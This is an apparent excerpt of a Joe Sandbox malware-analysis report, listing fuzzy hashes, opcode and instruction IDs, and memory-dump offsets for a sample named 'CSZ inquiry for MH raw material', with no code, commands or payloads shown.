                                                                        • Instruction ID: 22275540e57eb96fee6d5a54577e302c4c6762ace117197f628c66a1ac5fca9d
                                                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                        • Instruction Fuzzy Hash: 82D012326260B0D7CB39675D6914FA76A15DB81B94F1A006E740BA3904C5158C42D6F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                        • Instruction ID: fd02445ee87aa4de4d0e507c353c80a96b14fe2043fdc9f422f76848b242770e
                                                                        • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                        • Instruction Fuzzy Hash: 9CD080371E054CFBCB21DF65DC02F957FA9E754BA0F444021F504C75A1C63AE950D594
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 915399a752345f5fea927eef064a41f795efe59b08cce62eb904f2816dfb6217
                                                                        • Instruction ID: 57b95c2e18ff0295f24a8d1aa35b8a03ec9263e6e7de0721b55a835ee2720066
                                                                        • Opcode Fuzzy Hash: 915399a752345f5fea927eef064a41f795efe59b08cce62eb904f2816dfb6217
                                                                        • Instruction Fuzzy Hash: 06D05E3092120A8BCF1ACB04CB1493A3670EB10740F401068F64061521D329EC11C620
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction ID: a903bf837afcac1d274953145ff3f2af13b0671ee6b6742a294daaad20db7bde
                                                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction Fuzzy Hash: 3ED0C935613E80CFD62ACF0CC5A8B1577A4BB84B44F8504A1E401CBB61D62CED40CA14
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                        • Instruction ID: 93c2fb3f7d3f656e7b7006c30e15af06c0968de3bc20596a0fd83062bcd1ba66
                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                        • Instruction Fuzzy Hash: 49C08033150644AFC711DF98CD01F0177A9E798B40F000021F30447671C531FD10D654
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                        • Instruction ID: 266b6ca6f68278879c71c088c6b1d45047c7d98088dc2e7545c135bc5d762700
                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                        • Instruction Fuzzy Hash: 07D01236100288EFCB02EF41C890D9A7B2AFBC8710F108019FD19076118A75ED62DA60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                        • Instruction ID: 696a36aab37e94716ec844bd83d0a0afb2900b808fd5ce9bec42be47ba0793a6
                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                        • Instruction Fuzzy Hash: A8C04879701A828FCF15DB2AD694F89B7E4FB84744F151890F805DBB22E624ED41CA21
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 47261d38cee8dfc537f520079304ce36205f04872f3e9655707d05c4415b945d
                                                                        • Instruction ID: d52eab268c6d1b0277670107266fcb906790a2bcd8ec7e1569b302144c058915
                                                                        • Opcode Fuzzy Hash: 47261d38cee8dfc537f520079304ce36205f04872f3e9655707d05c4415b945d
                                                                        • Instruction Fuzzy Hash: D49002316458001392807158498558650059BE1301B95D022E0425554C8F148A965361
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 29fd80cb27193d80e580230838f89566b8c5388a2968d770a276a30304ab4bb0
                                                                        • Instruction ID: a427ad16013395d2cc3ceb50b8635c21b50317c75db082dd6b4bbe17ec706502
                                                                        • Opcode Fuzzy Hash: 29fd80cb27193d80e580230838f89566b8c5388a2968d770a276a30304ab4bb0
                                                                        • Instruction Fuzzy Hash: 379002716415004342807158490544670059BE23013D5D126A0555560C8B1889959269
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb20841dce453dcaaedc9c4de3b3c2d6ac0280be3a91b688828900bb506c8b40
                                                                        • Instruction ID: 53a8079d66dec833cad04356a4d9b2ee366abdec61aeb858e81eab8560bf8903
                                                                        • Opcode Fuzzy Hash: fb20841dce453dcaaedc9c4de3b3c2d6ac0280be3a91b688828900bb506c8b40
                                                                        • Instruction Fuzzy Hash: ED900235261400030285B558070554B14459BD73513D5D026F1417590CCB2189A55321
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 25d703ae70d5f2a8c36076bb024bcf8395323bbafaa589ee133501f7b7a361f9
                                                                        • Instruction ID: 79d772c835e557a49eb640453da411ab6c2eabdc8d7df4513f504e3e841a695c
                                                                        • Opcode Fuzzy Hash: 25d703ae70d5f2a8c36076bb024bcf8395323bbafaa589ee133501f7b7a361f9
                                                                        • Instruction Fuzzy Hash: C6900235251400030245B558070554710468BD6351395D032F1016550CDB2189A15121
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2637e7651b6515d01f0d55ea65ce55e29cffd6d02bc35bfb659cc4a97f37daa1
                                                                        • Instruction ID: 66b3ac53827dd491f40e62a89b1094153682285a85fe9384f5f18c71b172ba62
                                                                        • Opcode Fuzzy Hash: 2637e7651b6515d01f0d55ea65ce55e29cffd6d02bc35bfb659cc4a97f37daa1
                                                                        • Instruction Fuzzy Hash: 1D9002B1241540934640B2588505B4A55058BE1301B95D027E1055560CCA2589919135
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ee47c86a0e40f40410ee5a4d905d31c4923239010bc44dd9fc493277f184361d
                                                                        • Instruction ID: 7684f4aa652c18db8790615b25d4cd387c95b81d1ee72ae01449cbfe2b609704
                                                                        • Opcode Fuzzy Hash: ee47c86a0e40f40410ee5a4d905d31c4923239010bc44dd9fc493277f184361d
                                                                        • Instruction Fuzzy Hash: D690023124544843D28071584505A8610158BD1305F95D022A0065694D9B258E95B661
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e1b077ec98cd939aecaa7500e5e48d1bd8e2f671b768b2f8d19996654d8cac58
                                                                        • Instruction ID: 11e80f83e43033b7fed5ec219788249d23cbd14bab2197643214d13be5bec51d
                                                                        • Opcode Fuzzy Hash: e1b077ec98cd939aecaa7500e5e48d1bd8e2f671b768b2f8d19996654d8cac58
                                                                        • Instruction Fuzzy Hash: D590023124140803D2C07158450568A10058BD2301FD5D026A0026654DCF158B9977A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 13d5f53908c723d2021aaf4719f7b70a96c8457ef5b44e6833a67b4edcff5ff9
                                                                        • Instruction ID: 463c2597bb4b4753f9b2b202c5bd6f7961fe300dfd64c9c3fe6c033e302ced96
                                                                        • Opcode Fuzzy Hash: 13d5f53908c723d2021aaf4719f7b70a96c8457ef5b44e6833a67b4edcff5ff9
                                                                        • Instruction Fuzzy Hash: 4990023164540803D2907158451578610058BD1301F95D022A0025654D8B558B9576A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ad3d95fda88e21b4d5dd4c3dc22b6d70d1f62716d6b93f861a1f305f980a88aa
                                                                        • Instruction ID: beacffdde741fb6bb3aeb9ccabce9717e53bca844421b7ac96644e02e4c68cb8
                                                                        • Opcode Fuzzy Hash: ad3d95fda88e21b4d5dd4c3dc22b6d70d1f62716d6b93f861a1f305f980a88aa
                                                                        • Instruction Fuzzy Hash: 7590023124140803D244715849056C610058BD1301F95D022A6025655E9B6589D17131
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 056208571725e5476deca0281ba6cf92e9569779b76ac78fd4b42dc41bc79df1
                                                                        • Instruction ID: 6a55862997b38b8d4196fab4e890c21ff3cf38f64d4c18af391cfb43d4c7496e
                                                                        • Opcode Fuzzy Hash: 056208571725e5476deca0281ba6cf92e9569779b76ac78fd4b42dc41bc79df1
                                                                        • Instruction Fuzzy Hash: 9890023124140403D2407158560974710058BD1301F95E422A0425558DDB5689916121
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9f76f478769dc662a867821765f18dd072c605bbeacfa9bd9d491e53bcf379e3
                                                                        • Instruction ID: a05c8bed844950be1d6b656e11893331707252b885e2a9c8b1cde82c9b31b9cd
                                                                        • Opcode Fuzzy Hash: 9f76f478769dc662a867821765f18dd072c605bbeacfa9bd9d491e53bcf379e3
                                                                        • Instruction Fuzzy Hash: 2F90023164540403D2807158551974610158BD1301F95E022A0025554DCB598B9566A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6190effe429d1c9f7576ce8f126104ec0750a2e066d2a80c1878ee6de041c74f
                                                                        • Instruction ID: 544ed26691e092021ec8038dec9a157cd90b00f5107dd973cc448db531b204ab
                                                                        • Opcode Fuzzy Hash: 6190effe429d1c9f7576ce8f126104ec0750a2e066d2a80c1878ee6de041c74f
                                                                        • Instruction Fuzzy Hash: DD90023124140403D2407598550968610058BE1301F95E022A5025555ECB6589D16131
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 280ba3a783b7fedf07dc1ec3fc37b7df8df7502386e3eb8686c449ebd9fe1abc
                                                                        • Instruction ID: b8f3b5e1ca9c20a25bb7cc6b8693402482f9e3beca65581286e6bb15e70b7fec
                                                                        • Opcode Fuzzy Hash: 280ba3a783b7fedf07dc1ec3fc37b7df8df7502386e3eb8686c449ebd9fe1abc
                                                                        • Instruction Fuzzy Hash: 0E90023124140843D24071584505B8610058BE1301F95D027A0125654D8B15C9917521
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 05ec275dc77caadca5f8c7de153f5cc8ecfe5bb14846192f95a8e6f9132e8792
                                                                        • Instruction ID: 482415b912012ce229e43f8100f24b291e101ba440044790ba6e7485e32c88bd
                                                                        • Opcode Fuzzy Hash: 05ec275dc77caadca5f8c7de153f5cc8ecfe5bb14846192f95a8e6f9132e8792
                                                                        • Instruction Fuzzy Hash: F8900231282441535685B158450554750069BE13417D5D023A1415950C8A269996D621
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b3b7501591dee7cbc9b77cb04ea595751f64f5bbfe4d32dcb352645c6099f6e4
                                                                        • Instruction ID: fc7568e83544d0b87ee0632bddf1f027d9345482ce0ff2980f107f9bcc6af71d
                                                                        • Opcode Fuzzy Hash: b3b7501591dee7cbc9b77cb04ea595751f64f5bbfe4d32dcb352645c6099f6e4
                                                                        • Instruction Fuzzy Hash: A490023128140403D2817158450564610099BD1341FD5D023A0425554E8B558B96AA61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b0aef72dee6026c41f894adfa67836121dabf690e97902cd461acbefbb7ff015
                                                                        • Instruction ID: 1f3062e0aa637f05e1100be9c08bfbe8a71c8199795557503174cf18cb403157
                                                                        • Opcode Fuzzy Hash: b0aef72dee6026c41f894adfa67836121dabf690e97902cd461acbefbb7ff015
                                                                        • Instruction Fuzzy Hash: 1390023134140003D280715855196465005DBE2301F95E022E0415554CDE1589965222
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2687714cafbea5d87a4a422dd02bda72acb91bcfd5d97d9cc855f6aebf6021cd
                                                                        • Instruction ID: 5efbb27c06e3f844f93a7e0814be99dc6152f40feb18784a98457ca404a016b8
                                                                        • Opcode Fuzzy Hash: 2687714cafbea5d87a4a422dd02bda72acb91bcfd5d97d9cc855f6aebf6021cd
                                                                        • Instruction Fuzzy Hash: 8B90023124544443D24075585509A4610058BD1305F95E022A1065595DCB358991A131
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5c3d420e8d5d50257af4d68889ba3aa52371ad5f07426ed603503990f4378ada
                                                                        • Instruction ID: 4b2a7ea44fd31af704b70e6c052a8a8d469a1938a868ec97e87b65b608f59350
                                                                        • Opcode Fuzzy Hash: 5c3d420e8d5d50257af4d68889ba3aa52371ad5f07426ed603503990f4378ada
                                                                        • Instruction Fuzzy Hash: E390023925340003D2C07158550964A10058BD2302FD5E426A0016558CCE1589A95321
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9adb80d76a9832f07c1b0a024d724c8683936cfb0d5079f2a081bb8798ee5d37
                                                                        • Instruction ID: 4f4d6f65103765e29de45363da194818deccdbfee87d30eaf70e1cc1eecdb0b8
                                                                        • Opcode Fuzzy Hash: 9adb80d76a9832f07c1b0a024d724c8683936cfb0d5079f2a081bb8798ee5d37
                                                                        • Instruction Fuzzy Hash: D390027124180403D2807558490564710058BD1302F95D022A2065555E8F298D916135
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dda879a85567de026461d47d80e75f8ab75b3a14ed394a040be7e94792f9b8ad
                                                                        • Instruction ID: 0dc98540b0808cf2db31bc8c9e2d2c6b04d705db9a54c9188a6e197b5c2762d7
                                                                        • Opcode Fuzzy Hash: dda879a85567de026461d47d80e75f8ab75b3a14ed394a040be7e94792f9b8ad
                                                                        • Instruction Fuzzy Hash: 4890027124140403D2807158450578610058BD1301F95D022A5065554E8B598ED56665
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 91c5bd49f26f64a7f32ea1204d525db7e4c686675256e5cbe93ba07809c04363
                                                                        • Instruction ID: bc1259b288ee1cd839cca4458cb7cd57c7e6fc5db31cb43d550709b4766fd149
                                                                        • Opcode Fuzzy Hash: 91c5bd49f26f64a7f32ea1204d525db7e4c686675256e5cbe93ba07809c04363
                                                                        • Instruction Fuzzy Hash: C090023164140503D24171584505656100A8BD1341FD5D033A1025555ECF258AD2A131
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: df737333f09b8ed8c7bf969e747787e3bb4790449be71591516ee6c34a8a2a94
                                                                        • Instruction ID: 3c94673ad426aa37963b43343009d7e0c365078ee54758ec83d87cb12d71924c
                                                                        • Opcode Fuzzy Hash: df737333f09b8ed8c7bf969e747787e3bb4790449be71591516ee6c34a8a2a94
                                                                        • Instruction Fuzzy Hash: 4590023134140403D242715845156461009CBD2345FD5D023E1425555D8B258A93A132
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d587b38b39ba64b2e41b3346e6abfd6d41da6b03043c235ce51dd208d6800026
                                                                        • Instruction ID: c544579c67605c1af7f235c8d1c3a2ad1e3cf66faecb874adc76ec850e0d098c
                                                                        • Opcode Fuzzy Hash: d587b38b39ba64b2e41b3346e6abfd6d41da6b03043c235ce51dd208d6800026
                                                                        • Instruction Fuzzy Hash: 7F900231251C0043D34075684D15B4710058BD1303F95D126A0155554CCE1589A15521
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 187b881418c523a93c9dc5d8c912baf4560a0dcab9147f2a1897519e19a50d3f
                                                                        • Instruction ID: f8fb629f3159996e516c273bfc7a1f654120fbbc2664ce25358fef52b12507e9
                                                                        • Opcode Fuzzy Hash: 187b881418c523a93c9dc5d8c912baf4560a0dcab9147f2a1897519e19a50d3f
                                                                        • Instruction Fuzzy Hash: E790023124180403D2407158490978710058BD1302F95D022A5165555E8B65C9D16531
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e8e4fe9ca95872979beafaa43374f16269c113698a018edfd8555f400e69380b
                                                                        • Instruction ID: 7819e502a5a8613518900dea00536e9ee630d7db4a35fe65a1b03fa2fc6842df
                                                                        • Opcode Fuzzy Hash: e8e4fe9ca95872979beafaa43374f16269c113698a018edfd8555f400e69380b
                                                                        • Instruction Fuzzy Hash: 6B900231641400434280716889459465005AFE2311795D132A0999550D8A5989A55665
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b63f1007cb867f75ee5152d539563ed0e65577ae3a8b8e78e29f88ce6dffefc9
                                                                        • Instruction ID: a63283266489bef8d3aea52ccfd592abad1273cb9891b21caeacffcc70b430a6
                                                                        • Opcode Fuzzy Hash: b63f1007cb867f75ee5152d539563ed0e65577ae3a8b8e78e29f88ce6dffefc9
                                                                        • Instruction Fuzzy Hash: 7F90023124180403D2407158491574B10058BD1302F95D022A1165555D8B2589916571
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 02e112edecfde6e50247d8ac98e39fef479c1780bcfbf4fa7ff368d4727ba602
                                                                        • Instruction ID: 5b89c4b15c0614446b381065f65b86d34835f655646338e73b1630d8f0580d52
                                                                        • Opcode Fuzzy Hash: 02e112edecfde6e50247d8ac98e39fef479c1780bcfbf4fa7ff368d4727ba602
                                                                        • Instruction Fuzzy Hash: 9B90027125140043D2447158450574610458BE2301F95D023A2155554CCA298DA15125
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a985c0ecdf3b0f11835853a5c0ec06c791f1079496f64d1846b657b28f49fc82
                                                                        • Instruction ID: 6a578172045db9ee2873c66e257d66cb5d150ac22c029351bbfff55bf751749b
                                                                        • Opcode Fuzzy Hash: a985c0ecdf3b0f11835853a5c0ec06c791f1079496f64d1846b657b28f49fc82
                                                                        • Instruction Fuzzy Hash: F990027138140443D24071584515B461005CBE2301F95D026E1065554D8B19CD926126
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
